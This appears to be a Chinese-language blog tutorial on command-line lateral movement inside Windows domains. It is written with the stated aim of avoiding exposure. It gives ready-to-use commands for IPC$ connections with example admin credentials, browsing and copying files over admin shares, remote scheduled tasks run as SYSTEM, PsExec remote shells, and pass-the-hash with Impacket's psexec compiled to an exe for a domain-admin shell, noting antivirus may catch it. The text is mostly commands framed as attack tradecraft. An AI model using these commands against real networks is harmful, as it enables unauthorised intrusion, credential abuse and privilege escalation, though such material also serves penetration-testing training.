内网渗透-命令行渗透

在内网渗透时，如果登录远程桌面，容易暴露自己，所以还是尽可能使用命令行操作比较好

建立ipc连接
net use \\[ip] /u:[域名][用户] [密码]

例：net use \\192.168.83.10 /u:TEST\Administrator Iamtest123

net use 查看建立的ipc连接

net use \\192.168.83.10 /de /y 删除ipc连接

net view \\192.168.83.10 查看共享了哪些磁盘

dir \\192.168.83.10\c$\ 查看c盘目录

copy xxxx \\192.168.83.2\c$\ 上传文件到c盘

copy \\192.168.83.2\c$\xxx c:\ 下载文件到c盘

利用schtasks计划任务执行命令(不需要先创立ipc连接)

创建计划任务

schtasks /create /tn 任务名 /U 域\域用户 /P 域用户密码 /tr 执行的命令或bat路径 /sc ONSTART /s 域机子IP /RU system

执行计划任务

schtasks /run /tn 任务名 /s 域机子IP /U 域\域用户 /P 域用户密码

删除计划任务

schtasks /F /delete /tn 任务名 /s 域机子IP /U 域\域用户 /P 域用户密码

PsExec

下载地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
https://github.com/Al1ex/smbexec/releases
首先需要创建ipc连接
执行命令PsExec.exe \\192.168.83.10 -s cmd.exe -accepteula，然后等待一段时间，弹回shell

hash传递

另外我上篇抓取密码的文章中提到可以抓取密码的hash，我们可以通过该工具实现NTLM hash的传递
下载地址：https://github.com/SecureAuthCorp/impacket
上面的psexec.exe是微软的，并没有hash传递的功能
将Impacket中examples目录下的psexec.py用pyinstaller编译一下（编译完后有概率会被杀掉），生成psexec.exe文件
上传到服务器，使用命令：psexec.exe -hashes :xxxxxxxxxxxxxx TEST/Administrator@192.168.83.10获得域控管理员的shell

退出还会清掉文件
不好的就是中文会乱码

Impacket套件参考文章：http://www.secwk.com/2019/10/13/10518/